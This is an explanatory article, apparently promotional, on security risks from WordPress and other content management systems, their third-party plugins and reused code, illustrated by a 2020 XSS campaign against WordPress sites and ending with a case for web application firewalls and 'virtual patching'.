Cybersecurity is a “top of mind” concern for many organizations. In recent years, a deluge of data breaches and the introduction of new data privacy laws, such as the European Union’s General Data Protection Regulation (GDPR) and the California Consumer Privacy Act (CCPA) underscore the potential impacts of poor cybersecurity. In many cases, a single data breach has driven companies out of business.
While most companies are working to reduce their cyber risk, identifying and remediating all potential risk sources can be difficult or impossible. Additionally, many organizations focus on “internal” risks at the expense of third-party risk.
The benefits of Content Management Systems (CMSs), such as WordPress, have driven widespread adoption. However, these platforms can also be a source of cyber risk to an organization. In order to mitigate these risks, companies must take proactive steps to secure their web presence, such as deploying a web application firewall (WAF).
The Appeal of Content Management Systems
CMSs provide several different advantages to an organization. At a minimum, a CMS such as WordPress dramatically lowers the bar for effectively developing a website. Instead of requiring a thorough understanding of web programming languages, such as HTML, CSS, JavaScript, and PHP, a CMS enables users to visually build their desired site with all of the programming being performed invisibly behind the scenes by the CMS.
However, the benefits of a CMS are not limited to the ability to create standalone websites quickly and easily. Tools like WordPress also offer a number of plugins that provide additional functionality that can be easily added to a site. These features make it possible to rapidly create a fully-functional website that serves a complex purpose, such as an e-commerce site. Such a site needs to manage shopping carts and payment card information in a secure way, which can be challenging to implement properly. With WordPress, an e-commerce site can be rapidly built to an organization’s exact specifications.
CMSs Introduce Security Vulnerabilities
CMSs like WordPress, through their base functionality and available plugins, offer many advantages to an organization. However, these same features can also introduce potential security risks and vulnerabilities.
WordPress offers a wide range of third-party plugins. Since these plugins are not created by WordPress itself, they often lack the same level of security testing that, theoretically, is applied to the code of the platform itself. This lack of oversight and proper code review processes is made evident by the sheer number of vulnerabilities that are discovered in WordPress plugins and exploited by attackers.
Between April 28th and May 5th of 2020, a hacking group attempted to hijack over 900,000 WordPress sites using cross-site scripting (XSS) attacks. The attackers were scanning incoming traffic to the sites for logged-in administrators and tried to create backdoors to allow themselves to access the sites using these admin accounts.
Potentially more concerning than the attack itself was the number of different vulnerabilities that it tried to use. The cybercriminals attempted to exploit XSS vulnerabilities in at least five different plugins on the WordPress platform. While the vulnerabilities have been patched for some time, there is no guarantee that all WordPress users applied the updates. Also, the cybercriminals are likely sophisticated enough to adapt their attack to use newer vulnerabilities instead, which are less likely to have been patched.
The Challenges of Third-Party Risk Management
The vulnerabilities associated with the WordPress platform and the third-party plugins that many applications use pose a serious security issue for many companies. However, they represent only a fraction of the third-party risks that threaten the security of an organization’s web infrastructure.
Many applications also use third-party libraries and third-party code in their development. Websites like Stack Overflow, which are designed as question and answer forums for developers, are common sources of code that developers copy into their own projects. Sites such as Github provide complete libraries and code samples that programmers can download or copy as well.
While code reuse can improve the effectiveness and security of an application, it can also introduce vulnerabilities when done incorrectly. These vulnerabilities inherited from third-party libraries and code may be difficult to detect with application security solutions, if developers perform testing at all. As a result, these pieces of external code leave an organization potentially vulnerable to data breaches or other expensive and damaging security incidents.
Managing Third-Party Web Vulnerabilities
For most organizations, attempting to perform manual vulnerability management is difficult or impossible. Each year, over twenty thousand new vulnerabilities are discovered in production software. These are in addition to previously discovered vulnerabilities in programs still in active use by organizations.
The use of CMSs, such as WordPress, and third-party code (in imported libraries or copied code samples) increases the complexity of vulnerability management. If an organization lacks complete visibility into the code used by its applications, it is easy to overlook a critical vulnerability and patch for the vulnerable code. Rather than attempting to identify and attempt to patch each vulnerability manually, organizations require a better solution for managing vulnerabilities in their code. Deploying a WAF provides a scalable method for accomplishing this.
A robust WAF solution offers “virtual patching” of vulnerabilities by blocking any traffic to an application that is designed to exploit a known vulnerability. A WAF’s list of potential threats can be updated more quickly and scalably than a vulnerable application, making it possible to protect against all potential vulnerabilities and risks to a web application, whether third-party or otherwise.